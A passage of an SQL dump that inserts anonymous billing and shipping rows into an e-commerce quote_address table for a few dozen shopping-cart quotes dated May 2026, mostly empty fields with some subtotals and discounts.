INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(2063, 1215, '2026-05-01 10:39:32', '2026-05-01 10:39:32', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2064, 1215, '2026-05-01 10:39:32', '2026-05-01 10:39:32', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2065, 1216, '2026-05-01 10:39:45', '2026-05-01 10:39:45', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2066, 1216, '2026-05-01 10:39:45', '2026-05-01 10:39:45', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2067, 1217, '2026-05-01 10:39:51', '2026-05-01 10:39:51', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2068, 1217, '2026-05-01 10:39:51', '2026-05-01 10:39:51', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2069, 1218, '2026-05-01 10:39:58', '2026-05-01 10:39:58', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2070, 1218, '2026-05-01 10:39:58', '2026-05-01 10:39:58', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2071, 1219, '2026-05-01 10:40:14', '2026-05-01 10:40:14', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2072, 1219, '2026-05-01 10:40:14', '2026-05-01 10:40:14', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2073, 1220, '2026-05-01 10:40:20', '2026-05-01 10:40:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2074, 1220, '2026-05-01 10:40:20', '2026-05-01 10:40:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2075, 1221, '2026-05-01 11:57:21', '2026-05-01 11:57:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2076, 1221, '2026-05-01 11:57:21', '2026-05-01 11:57:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2077, 1222, '2026-05-01 16:20:42', '2026-05-01 16:20:42', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2078, 1222, '2026-05-01 16:20:42', '2026-05-01 16:20:42', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2079, 1223, '2026-05-01 16:58:01', '2026-05-01 16:58:01', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2080, 1223, '2026-05-01 16:58:01', '2026-05-01 16:58:01', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2081, 1224, '2026-05-01 19:40:42', '2026-05-01 19:40:42', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2082, 1224, '2026-05-01 19:40:42', '2026-05-01 19:40:42', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2083, 1225, '2026-05-01 23:49:29', '2026-05-01 23:49:29', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2084, 1225, '2026-05-01 23:49:29', '2026-05-01 23:49:29', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2085, 1226, '2026-05-02 03:00:39', '2026-05-02 03:00:39', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2086, 1226, '2026-05-02 03:00:39', '2026-05-02 03:00:39', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2087, 1227, '2026-05-02 07:16:58', '2026-05-02 07:16:58', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2088, 1227, '2026-05-02 07:16:58', '2026-05-02 07:16:58', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2089, 1228, '2026-05-02 10:31:16', '2026-05-02 10:31:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2090, 1228, '2026-05-02 10:31:16', '2026-05-02 10:31:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2091, 1229, '2026-05-02 13:36:13', '2026-05-02 13:36:13', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2092, 1229, '2026-05-02 13:36:13', '2026-05-02 13:36:13', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2093, 1230, '2026-05-02 15:17:20', '2026-05-02 15:17:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2094, 1230, '2026-05-02 15:17:20', '2026-05-02 15:17:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2095, 1231, '2026-05-02 18:14:12', '2026-05-02 18:14:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2096, 1231, '2026-05-02 18:14:12', '2026-05-02 18:14:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2097, 1232, '2026-05-02 23:12:12', '2026-05-02 23:12:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2098, 1232, '2026-05-02 23:12:12', '2026-05-02 23:12:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2099, 1233, '2026-05-03 01:36:27', '2026-05-03 01:36:27', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2100, 1233, '2026-05-03 01:36:27', '2026-05-03 01:36:27', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2101, 1234, '2026-05-03 06:42:33', '2026-05-03 06:42:33', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2102, 1234, '2026-05-03 06:42:33', '2026-05-03 06:42:33', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2103, 1235, '2026-05-03 07:09:35', '2026-05-03 07:09:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2104, 1235, '2026-05-03 07:09:35', '2026-05-03 07:09:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2105, 1236, '2026-05-03 09:07:27', '2026-05-03 09:07:27', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2106, 1236, '2026-05-03 09:07:27', '2026-05-03 09:07:27', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
